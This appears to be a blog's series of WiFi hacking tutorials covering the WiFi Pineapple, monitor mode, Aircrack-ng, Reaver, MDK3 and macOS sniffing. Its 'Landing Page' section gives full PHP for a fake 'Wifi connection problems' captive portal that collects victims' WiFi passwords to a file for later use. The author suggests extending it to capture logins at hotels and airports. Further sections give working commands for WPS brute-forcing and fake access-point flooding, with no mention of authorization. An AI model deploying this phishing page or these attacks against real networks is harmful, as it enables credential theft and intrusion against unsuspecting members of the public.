Wifi Pineapple Module DWall

This is the first tutorial about Wifi Pineapple modules. I will start with a simple one called DWall. With this module you can gather and display easily live informations from connected clients wich using the HTTP protocol.

Objective

Installation and usage of module DWall on the Wifi Pineapple.

Precondition

Your Wifi Pineapple need to have an internet connection.

Installation

This time we will use the browser UI for the installation. Let’s start… Look for DWall among the available modules, click the “Install” button and select the location (you should always select the SD card, if available).

DWall installation on Wifi Pineapple

Via Terminal you can verify the installation, too.

# list installed modules on sdcard folder
$ ssh root@192.168.2.10 -C 'ls -la /sd/modules/'

Usage

After successful installation (which should be quite fast), select the module. Now activate it and start the listener. As soon as a connected client makes requests with HTTP, you will see them in the module output. Depending on the responce, also other data such as pictures.

DWall report on Wifi Pineapple UI

Now the last one should also understand why encryption (HTTPS) is so important! Even if it is already used a lot, you will figure that many websites still work without encryption.

Create landing pages for Wifi Pineapple

With the Wifi Pineapple from Hak5 you can create “Landing Pages” in few minutes. With some luck people insert their they credentials and you can use them. In this tutorial I will explain how easy this can be done without any extra modules installed (like Evil Portal and so on).

Objectives

Only with standard features we setup a captive portal (for the http protocol) in which we can try to collect credentials.

Precondition

To use the “Landing Page” feature of your Wifi Pineapple, you need a working internet connection on the device. In this tutorial you can learn how to do this for macOS.

Prepare and test locally

Before you write the code directly on the device, I recommend to code and and test it locally. This section will explain how.

# create project
$ mkdir -p ~/Projects/LandingPage

# change directory
$ cd ~/Projects/LandingPage

# create PHP file
$ vim index.php

# test with PHP built-in Web Server
$ php -S localhost:8000
<?php
// Landing page configuration
$SSID = 'ExampleSSID';

// Landing page content
if (isset($_POST['wifi_password']) && !empty(trim($_POST['wifi_password']))) {
  $data = $SSID . ':' . htmlspecialchars(trim($_POST['wifi_password'])) . "\n";
  file_put_contents('/tmp/wifi-passwords.txt', $data, FILE_APPEND | LOCK_EX);
  header("Location: https://google.com");
} else {
  echo '<!DOCTYPE HTML><html lang="en-US"><head>';
  echo '<title>' . $SSID . ' Connection Failure</title>';
  echo '<meta charset="utf-8">';
  echo '<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">';
  echo '<meta name="generator" content="' . $SSID . '">';
  echo '<style>';
  echo 'html, body {';
  echo '  font-family: Helvetica, sans-serif;';
  echo '  background: #f3f2f2;';
  echo '}';
  echo 'h1 {';
  echo ' padding-bottom: 20px;';
  echo ' border-bottom: 1px solid #eee;';
  echo ' font-size: 25px;';
  echo ' color: #4288CC;';
  echo '}';
  echo 'p {';
  echo ' margin-bottom: 20px;';
  echo ' padding-bottom: 20px;';
  echo ' font-size: 15px;';
  echo ' color: #777;';
  echo ' border-bottom: 1px solid #eee;';
  echo '}';
  echo 'input {';
  echo ' padding: 5px;';
  echo '}';
  echo '.center {';
  echo '  margin: 150px auto auto auto;';
  echo '  padding: 20px;';
  echo '  width: 450px;';
  echo '  text-align: center;';
  echo '  border: 1px solid #ccc;';
  echo '  border-radius: 5px;';
  echo '  background: #fff;';
  echo '  box-shadow: 4px 4px 5px 0px rgba(50, 50, 50, 0.75);';
  echo '}';
  echo '</style></head>';
  echo '<div class="center">';
  echo '<h1>Wifi connection problems</h1>';
  echo '<p>Please enter your password for "' . $SSID . '" <br> and press "Reconnect" to solve this issue.</p>';
  echo '<form method="POST" action="' . htmlspecialchars($_SERVER["PHP_SELF"]) . '">';
  echo '<input type="password" name="wifi_password" size="35" maxlength="65"> ';
  echo '<input type="submit" name="submit" value="Reconnect">';
  echo '</form></div></html>';
}

Open your Browser and use the URL http://localhost:8000. You can go back to your favorite editor and work on it. After you’re done press Ctrl-C to quit the build-in server.

Create Landing Page on Wifi Pineapple

Connect in your Browser to the Wifi Pineapple device, login and copy/paste the php code into “Landing Page” textarea. Save and enable the feature.

Wifi Pineapple Landing Page configuration.

Here a picture from my iPad after joining the wifi network.

Fake captive portal from Pineapple

If you read the PHP code, you will see that all informations are stored into file wifi-passwords.txt.

# SSH into pineapple
$ ssh root@<wifi pineapple ip>

# read gathered informations
$ cat /tmp/wifi-passwords.txt

# or tail
$ tail -f /tmp/wifi-passwords.txt

Note: You can extend the code to gather the username and password (incl. checkbox for acceptable use policy) where users of public-access network are obliged to view and interact with before access is granted (like hotels, airports, etc.).

Share internet from macOS to Wifi Pineapple

I have been using the Wifi Pineapple Nano by Hak5 for a long time. What can I say – very, very cool tiny device. Since I am also a macOS user, I would like to show in this tutorial how I share my internet (Wifi to USB). There are various options but with this I have currently achieved the best results.

Important: You should carry out all firmware upgrades beforehand, since the settings (which I will show you soon) will be overwritten again.

Objectives

I would like to connect my Macbook to the Internet via WiFi and then make it available to the Wifi Pineapple via USB. So here both devices should be able to use the Internet without network conflicts.

Change Wifi Pineapple network

# show interface configuration (optional)
$ ifconfig

# connect to Pineapple device via SSH
$ ssh root@172.16.42.1

# backup network file
$ cp /etc/config/network /etc/config/network.bak

# show all settings (optional)
$ uci show

# show network settings (optional)
$ uci show network

# change ip with UCI configuration tool
$ uci set network.lan.ipaddr='192.168.2.10'

# change gateway with UCI configuration tool
$ uci set network.lan.gateway='192.168.2.1'

# save changes
$ uci commit

# reboot device
$ reboot

The first steps of the configuration have been carried out. However, you still cannot connect to the device or share the internet!

Modify macOS network configuration

Now you have to configure the macos network dhcp with manual address (network.lan.gateway 192.168.2.1). To do this, open the network settings and select the Wifi Pineapple (AX88x72A). Select “DHCP with manual address” in the dropdown and assign the IP (next to Configure IPv4).

Configure device as DHCP with manual address.

You should also change the arrangement of your available network connections (devices). Click the gear icon and select “Set Service Order”. At the top should be the standard wifi followed by Wifi Pineapple.

set service order

After a short time, the settings should have been accepted.

Wifi to USB internet sharing

Now we are making the internet available from Wifi to Wifi Pineapple (USB). Launch Internet Sharing under System Preferences. On “Share your connection from” select the Wifi and on “To computers using” select the Wifi Pineapple.

share internet from Wifi to USB

Done … let’s verify all configurations.

# show interface configuration (optional)
$ ifconfig

# connect to Pineapple via SSH
$ ssh root@192.168.2.10

# run simple ping (optional)
$ ping -c 1 google.com

# exit SSH connection to Pineapple
$ exit

# open browser
$ open http://192.168.2.10:1471

Note: The Browser URL is now http://192.168.2.10:1471 (network.lan.ipaddr 192.168.2.10)!

After login you can go to the Dashboard and check “Bulletins” which should show the latest news from wifipineapple.com.

Wifi Monitor Mode Basics

There are several ways to enable monitor mode for Wifi interfaces. Depending to your OS, installed packages, installed drivers and the Wifi model these methods are available and/or useful. In this tutorial I will explain three different ways.

3 different ways

The first example enables the monitor mode via iwconfig. To start/stop the interface the ip command is used, but you could also use ifconfig command.

# disable interface
$ ip link set wlan0 down

# enable monitor mode
$ iwconfig wlan0 mode monitor

# check interface status (optional)
$ iwconfig wlan0 | grep -i mode | awk '{print $4}'

# enable device
$ ip link set wlan0 up

The second example enables monitor mode via airmon-ng. The explicit start or stop of the interface is not necessary here. Attention, this method will change the name of the interface.

# stop interfering processes
$ airmon-ng check kill

# enable monitor mode
$ airmon-ng start wlan0

# check interface status (optional)
$ iwconfig wlan0mon | grep -i mode | awk '{print $4}'

The third example enables monitor mode via iw. To start/stop the interface the ifconfig command is used, but you could also use ip command.

# disable interface
$ ifconfig wlan0 down

# enable monitor mode
$ iw wlan0 set monitor control

# check interface status (optional)
$ iw dev | grep -i type | awk '{print $2}'

# enable device
$ ifconfig wlan0 up

It may happen that your interface crashes during the scan. In that case, you should choose a different method. If none of the shown examples works properly, it could be due to the Network Manager. In this case, turn it off. Attention, this action is then valid for all interfaces and can disturb your internet connection.

# stop network manager
$ systemctl stop NetworkManager

Reaver, Wash and CentOS 7

In part 3, I show how to install Reaver/Wash on CentOS 7.

Preparation

Installation

# download reaver and wash
$ wget https://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz

# unzip
$ tar -zxvf reaver-1.4.tar.gz

# install reaver and wash
$ cd /reaver-1.4/src
$ ./configure
$ make install

# optional read docs
$ cat /reaver-1.4/docs/README.REAVER
$ cat /reaver-1.4/docs/README.WASH

Usage

# kill interfering processes
$ airmon-ng check kill

# set interface into monitor mode (my interface is wlp0s11u1)
$ airmon-ng start wlp0s11u1

# find WPS routers via wash
$ wash -I wlp0s11u1mon

# start reaver running
$ reaver -i wlp0s11u1mon -b <ESSID> -t 2 -vv

MDK3 and CentOS 7

Last time i showed you, how to install Aircrack-ng. This time we will install MDK3 on CentOS 7.

Preparation

Installation

# install needed software
$ yum install -y wget bzip2

# download mdk3
$ wget http://aspj.aircrack-ng.org/mdk3-v6.tar.bz2

# unzip mdk3
$ bzip2 -cd mdk3-v6.tar.bz2 | tar xvd -

# compiling
$ cd d mdk3-v6/
$ make
$ mv mdk3 /usr/local/bin/
$ make clean

Usage

# create text-file with fake AP`s
$ echo -e "the force is with you\ncheck me\nhave fun" > fakeAP

# kill interfering processes
$ airmon-ng check kill

# set interface into monitor mode (my interface is wlp0s11u1)
$ airmon-ng start wlp0s11u1

# start mdk3 to create fake AP`s
$ mdk3 wlp0s11u1mon b -f fakeAP

Aircrack-ng and CentOS 7

This time i will show you, how to install Aircrack-ng on CentOS 7. My CentOS 7 (CentOS Linux release 7.2.1511 x64) is a virtual maschine on VirtualBox (5.0). As wireless USB Adapter i use TP-Link TL-WN822N.

Preparation

  • CentOS 7 VM created and started
  • SSH access (optional)
# add epel repository
$ yum install -y epel-release

# install wireless-tools
$ yum install -y wireless-tools

# check wifi
$ iwconfig
$ ip addr

Install Aircrack-ng

# install needed software
$ yum install -y git-svn libpcap-devel sqlite-devel gcc gcc-c++ libnl-devel openssl-devel usbutils pciutils rfkill

# get latests version (my was Aircrack-ng 1.2 rc3 r2799)
$ svn co http://svn.aircrack-ng.org/trunk/ aircrack-ng

# Compiling
$ cd aircrack-ng/
$ make install clean

Usage

# kill interfering processes
$ airmon-ng check kill

# set interface into monitor mode (my interface is wlp0s11u1)
$ airmon-ng start wlp0s11u1

# start packet capturing
$ airodump-ng wlp0s11u1mon

# stop monitor mode
$ airmon-ng stop wlp0s11u1mon

Scan Wifi from Terminal

There is a command line tool that allows you to work with the wireless connection on your Mac. The tool is very useful but by default hidden and not well documented.

airport

# show airport help
$ /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport --help

networksetup

# find device names
$ networksetup -listallhardwareports

Turn on/off and join

# turn it off
$ networksetup -setairportpower en0 off

# turn it on
$ networksetup -setairportpower en0 on

# join a network
$ networksetup -setairportnetwork en0 <SSID> <Password>

Let`s start a wifi scan and get some information

# scan with interface en0
$ /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport en0 --scan

# show information of en0
$ /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport en0 --getinfo

Note: If do not specify the interface, airport will use the first wifi interface on the system.

Easy way

# create a symbolic link to the command
$ sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport

# after link created start the scan
$ airport en0 --scan

Sniff

# find WEP
$ airport en0 scan | grep WEP

# start sniff on channel
$ airport en0 sniff 6

The captured packets you will find as “/tmp/airportSniffXXXXXX.cap”.